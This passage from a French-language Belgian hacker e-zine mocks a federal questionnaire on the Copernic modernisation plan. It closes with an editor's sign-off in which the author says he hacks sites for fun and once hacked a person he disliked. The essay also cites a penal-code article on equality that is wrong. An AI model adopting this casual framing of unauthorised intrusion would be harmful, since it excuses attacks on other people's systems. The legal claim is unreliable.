dépliant qui accompagne ce questionnaire reprend la | .BE | philosophie de base pour la modernisation de |Belgique| l'administration fédérale. ---------- Dans quelle mesure êtes-vous d'accord ou non sur cette | Le Plan| proposition ? (NOTE: ce dépliant en gros explique la même | | chose que le questionnaire 1) |COPERNIC| | | 2. Comment voudriez vous communiquer à l'avenir avec | | l'administration publique ? | | (Donnez des points de 1 à 8, 1 étant le meilleur score) | | | | -Lettre -par le biais de la commune | | -téléphone -contact personnel | | -internet à domicile -télétexte interactif |pour la| -internet dans une bibliothéque -internet |moderni-| |sation | 3. A quoi attachez vous le plus d'importance dans l'attitude |de l' | des fonctionnaires. |admini- | (Donnez des points de 1 à 4, 1 étant le meilleur score) |stration| |fédérale| -convivialité -être à l'écoute des gens | | -traitement égal pour tous -respect de la vie privée | | | | 4. Quelle amélioration du service publique jugez-vous | | prioritaire ? | | (Pour le classement vois ci-dessus) | | | | -rapidité du service -simplicité des procédures | | -qualité du service -disponibilité | | | | 5. La promotion des fonctionnaires doit se faire sur une base | | et dépolitisée. De quoi doit-on le plus tenir compte, | | selon vous ? | | (indiquez vos priorités de 1 à 3) | | | | -Sélection en fonction des années de service | | -Sélection en fonction du diplôme | | -Sélection en fonction des compétence |________| Bon voilà, maintenant je vais critiquer et/ou répondre à chaque questions les unes aprés les autres... Question 1 : Arf, ben je pense bien que je suis d'accord, comment veut-tu que le gov puisse gérer la gestion journaliére des 20.000 agents du service publique. Remarquez que c'est pas vraiment une question, puisqu'il n'y a qu'une réponse possible Question 2 : Pkoi il sont nommé à vie sinon ? Question 3 : Ha c'est vrai que dans l'administration ont choisi toujours les plus incompétent de ses sous-services pour diriger. Encore une question ou on nous force la main Question 4 : Lol, non on vas plutot les évaluer aux nombres d'heures prestée ;-). En plus si les résultat à atteindre n'était pas fixé à l'avance, comment voulez vous les obtenir puisque vous ne cherchez pas à les atteindre (Encore une question forcée) Question 5 : Heu ouais pkoi pas, c pas mal. Mais à propos, les cabinets à l'origine, c'est pas justement des petit secrétariat personnel au service du ministre ? ;-) Question 6 : Ha c'est vrai que je suis pas du tout d'accord avec cette affirmation, surtout pas me donner des garantie de qualité, ha ca non ! Remarquez que sur 6 questions, pour l'instant aucune n'en réellement une, en effet toute sont orientée de telle sorte qu'on ne puisse répondre qu'une seule chose (sauf si vous travailler à l'administraion évidemment ;-) Bon maintenant passons à la feuille 2: Question 1 : Arf, ben ouais j'suis d'accord, pkoi j'ai le chois ? ;-) Question 2 : Ha là, ca m'a fait bondir ! Hé oui, seule 3 des 8 propositions ne sont pas payantes... Réfléchissez, le téléphone, internet chez vous ou à la biblio ou à la poste (même les biblio font payer maintenant), le télétexte (ben oui faut avoir une télé et un abonnement)... Seule le contact direct, par le biais de la commune ou la lettre ne représente qu'un cout minime pour les personne qui ont le plus besoin des services publiques, les sans-papier, les sdf et autres. Finalement avec toutes ces propositions ou internet apparait partout, on empêche l'accés aux services PUBLIQUE par les personnes qui ne possédent pas les moyen financier de se procurer ces moyens technologique. En fait donc cette question peut amener à une violation de l'article 2 du code pénal disant que tout les belges sont égaux ! Question 3 : Arf, déjà y'a 3 des 4 propositions qui sont obligatoire, l'écoute (ben ouais vous leur demandre qqch il faut qu'il le fassent, c'est avec vos impot qu'ils sot payé non ?!!), le traitement égal pour tous (c'est la loi), et le respect de la vie privée (paske ces connards veulent nous espionner en plus ;-). Finalement il ne reste qu'une proposition qui, comme elle est facultative, pourrait être améliorée, la convivialité. En gros cette question au fond demande si on veut que les agents soit plus conviviaux ou pas... et puis quoi encore bien sure que non !! (tss il sont bêtes ces ministres) ;-) Question 4 : Ben tient tout les 4 bien sur, y'en a pas une de + prioritaire, ces 4 choses devrait être fournis à la base... !! Question 5 : Pkoi, la promotion des fonctionnaires ne se fait pas sur une base objective maintenant ? C'est sur qu'il faut tenir compte des années de service à ne rien faire dans le bureau pour les promotions, pff avoir des compétence ou un diplôme ca sert à rien... Bref, je pense que vous avez bien vous ou se tenait la fourberie de ce questionnaire, j'éspére maintenant que le gouvernement y repensera à deux fois avant d'envoyer des questions aussi stupide. Notez d'ailleur que ce référendum a fait un big flop, en effet seul 20.000 personnes sur les 7.000.000 questionnée ont répondus (tient, vingt mille, c'est pas justement le nombre d'employé à la fonction publique ;-) ? ) Bon voilà, j'éspére que cet article a défaut d'avoir servit a remplir un peux plus le mag vous aura un peux ouvert l'esprit et dévelopé votre sens critique. Souvenez vous que la dictature n'est jamais loin, et que la citoyéneté, et la liberté ne sont pas des droits, ce sont des devoirs, à accomplir chaque jour. ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ Bon voilà, BHZ Mag n°7 est termine, et je ne sais pas trop quoi mettre comme mot de la fin, en plus j'ai pas d'inspiration, je n'en suis qu'à ma deuxieme Jupiler, GRIm@ est meilleur que moi aux Echecs-VMB, j'ai ecrit que deux articles pour ce zine et les cours recommencent dans quelques jours. Et en plus j'ai renverse un peu de biere à terre à cause de Jonhatan Davis et son groupe et leur super musique que j'adore. Mais bon là je suis en train de deraper sur un sujet qui n'est pas celui sense etre aborde par ce zine, de toute facon il est inutile de preciser que KoRn est le meilleur groupe au monde, cela a ete prouve. (Et non GRIm@ ce n'est pas Queen le meilleur groupe :)) Enfin bon, cette fois-ci je ne vais pas encore sortir une de mes habituelles elucubrations sur l'etat de la scene en Belgique francophone ou en Belgique tout court, voire dans le monde. De toute fracon, personne n'en tient compte et si ca se trouve personne ne les lit, mais j'en ai rien à foutre. En somme je devrais ecrire un truc du genre "Pourquoi faisons nous ce que nous faisons ?" comme mot de la fin. Oui cela me semblerait approprie. Cela serait plus simple si la question avait ete "Pourquoi! sommes nous ce que nous sommes ?" J'y aurais repondu, parce que Vous nous avez fait comme ca, oui Vous le peuple, le monde, les humains, ah ca c'est clair que ca le fait à donf, ca donne tout de suite une petite ambiance anarchiste, mais bon, ne deconnons pas, qui aujourd'hui peut se targuer de hacker uniquement des sites pedophiles, nazis, etc... (encore faudrait il y arriver) Non, si on fait ca (du moins si moi je le fais) ce n'est pour aucune raison, juste comme ca ; pour passer le temps, parce que j'ai envie, pour faire le malin, pour m'amuser, il m'arrive quand meme quelque fois (rarement) ou c'est pour une noble cause, mais bon, le hacker-qui-hacke-des-sites-pedos-et-nazis c'est une image. Une belle image certes, mais ca reste une image. Pas la peine de disserter là dessus, mon premier "hack" (mais en etait ce vraiment un ?) c'etait envers quelqu'un que je n'aimais pas trop et qui m'avait passablement enerve (bon ok j'etais tres jeune dans le temps donc c'est excusable). Mais reprenons l'image du hacker solitaire qui se bat contre la pornographie et le nazisme, c'est quand meme un sentiment de haine, de la haine envers ce qu'il considere comme immoral. Alors à partir de là on pourrait considere que tout hack, qu'il soit "White Hat" ou "Black Hat" (je ne sais pas vous mais moi je deteste ces expressions) est base sur la HAINE, il ne faut blamer personne, c'est un sentiment purement humain que celui de haine, difficile de le renier, à moins de s'appuyer sur une puissance superieure imaginaire (Dieu, etc...) Ce sentiment est omnipresent dans nos vies et donc aussi dans le hack, Ce qui est amusant c'est que le hack ou piratage informatique est une activitee consideree comme illegale, mais dans ce cas, toute activite humaine devrait etre consideree comme illegale, seuls certains sentiments devraient subsister, l'amour l'amitie, les trucs du genre, tout le reste serait illegal. La Vie en elle meme serait, si on suit ce raisonnement, illegale, Nous sommes tous des illegaux (terme utilise pour designer les personnes residant illegalement en Belgique) Ainsi, si l'on s'entretue (ce qui risque d'arriver tres bientot) cela ne sera que pure vengeance, chacun aura toujours quelque chose à reprocher à son voisin, son frere, son pere, son meilleur ami, et là, on aura tous draoit au chaos et à l'anarchie totale, tout celà grace à la nature humaine. Cool.